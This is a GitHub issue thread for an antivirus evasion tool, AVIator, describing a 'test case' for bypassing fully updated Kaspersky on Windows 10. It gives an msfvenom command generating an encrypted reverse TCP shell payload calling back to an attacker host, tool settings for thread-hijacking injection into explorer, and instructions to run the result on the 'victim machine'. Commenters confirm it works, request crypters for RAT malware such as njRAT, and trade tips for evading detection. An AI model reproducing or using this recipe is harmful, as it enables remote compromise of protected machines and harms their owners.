Ch0pin / AVIator

Antivirus evasion project
GNU General Public License v3.0
1.05k stars 222 forks source link

Kaspersky AV bypass Test Case #5

Open Ch0pin opened 5 years ago

Ch0pin commented 5 years ago

Bypassing Kaspersky AV on a Win 10 x64 host (TEST CASE) Getting a shell in a windows 10 machine running fully updated kaspersky AV

Target Machine: Windows 10 x64 Create the payload using msfvenom

msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp

Use AVIator with the following settings

Target OS architecture: x64

Injection Technique: Thread Hijacking (Shellcode Arch: x64, OS arch: x64)

Target procedure: explorer (leave the default)

Set the listener on the attacker machine

Run the generated exe on the victim machine

pretech86 commented 5 years ago

Thanks for your efforts it working well

Do you have any tool like Aviator but for encrypt exe payload like meterpreter also for encrypting malware servers like njrat and darckcommet

Thanks a lot

Ch0pin commented 5 years ago

Thanks for your efforts it working well

Do you have any tool like Aviator but for encrypt exe payload like meterpreter also for encrypting malware servers like njrat and darckcommet

Thanks a lot

not yet , but this is something that for sure I am going to implement in the very near feature

pretech86 commented 5 years ago

my Dear i test the windows/ meterpreter/reverse/https and tcp there's no reverse connections

also when i test x64/shell it working there's a reverse connection but no meterpreter channel opened

ghost commented 5 years ago

Once you use meterpreter,the antivirus will detect it.However,shell won't. Maybe encoding the dropped dll is the best way.

pretech86 commented 5 years ago

i use x/64 shell and it worked but no channel open although there's a reverse connection?

Ch0pin commented 5 years ago

Make sure you are selecting the right architecture for your shell code and for your target OS. As pple7000 said when u use meterpreter the Av propably will detect it and drop the connection as suspicious, if you use a simple shell payload the bypass works fine.... Just press few enters after the connection is open ;)